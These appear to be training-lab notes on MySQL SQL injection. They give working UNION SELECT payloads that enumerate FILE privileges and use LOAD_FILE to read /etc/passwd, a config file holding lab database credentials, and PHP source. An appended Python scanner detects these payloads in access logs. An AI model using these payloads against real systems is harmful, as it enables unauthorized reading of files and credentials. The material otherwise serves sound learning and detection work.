SQLI READING FILES
In order for the DB user to load and read a file's content, the DB user must have the FILE
privilege
IDENTIFYING DB USER FILE PRIVILEGES
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
* can add a filter WHERE user="root" to only show privileges for the current user named root
* Y means YES, indicating superuser privileges
* ALT: cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
- this cmd lists, directly from the schema, all of the privileges granted to the current user
- the FILE privilege is the most important as it enables the attacker to read local system files and potentially even write files
READING LOCAL SYSTEM FILES
#passwd file
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
* this cmd will read the contents of the passwd file through the SQL injection
* this method can also be used to potentially leak the application source code as well.
#reading the configuration file
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
* 'localhost', 'DB_USERNAME'=>'root', 'DB_PASSWORD'=>'dB_pAssw0rd_iS_flag!', 'DB_DATABASE'=>'ilfreight' ); $conn = mysqli_connect($config['DB_HOST'], $config['DB_USERNAME'], $config['DB_PASSWORD'], $config['DB_DATABASE']); if (mysqli_connect_errno($conn)) { echo "Failed connecting. " . mysqli_connect_error() . ""; } ?>
#reading source code file
root@oco:~$ BROWSER > {targetSite:port}
input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
CTRL + U
* view the page source to read the source code, which may contain sensitive information like
database connection credentials or more vulnerabilities
* the default Apache webroot is /var/www/html and the vulnerable page identified is
search.php located at /var/www/html/search.php
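Detection side of the requests above, as an added example that is not part of the original notes: a small scanner that flags web access-log lines whose query parameters contain the privilege-enumeration and LOAD_FILE patterns used here. The log lines are constructed, and the parameter name port_code and the rule names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rules derived from the payloads in these notes (matched case-insensitively).
RULES = {
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "priv_enum": re.compile(r"\b(mysql\.user|information_schema\.user_privileges)\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}
# Request field of a common/combined access-log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return the sorted rule names matched by any query parameter in one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = set()
    # parse_qsl percent-decodes each value and turns '+' into a space
    for _name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        text = re.sub(r"\s+", " ", value)  # collapse whitespace runs before matching
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    return sorted(hits)


# Constructed sample log lines (192.0.2.10 is a documentation address).
# The parameter name port_code is an assumption; search.php is the page from the notes.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /search.php?port_code=cn HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?port_code=%27+UNION+SELECT+1%2C+LOAD_FILE%28%22%2Fetc%2Fpasswd%22%29%2C+3%2C+4--+- HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?port_code=%27+UNION+SELECT+1%2C+super_priv%2C+3%2C+4+FROM+mysql.user--+- HTTP/1.1" 200 700',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /search.php?port_code=cn%27+UNION+SELECT+1%2C+grantee%2C+privilege_type%2C+4+FROM+information_schema.user_privileges--+- HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_line(line) or ["clean"], "<-", line.split('"')[1])
```

The scanner only sees what the access log records, so parameters sent in a POST body need the same rules applied at a WAF or in application logging.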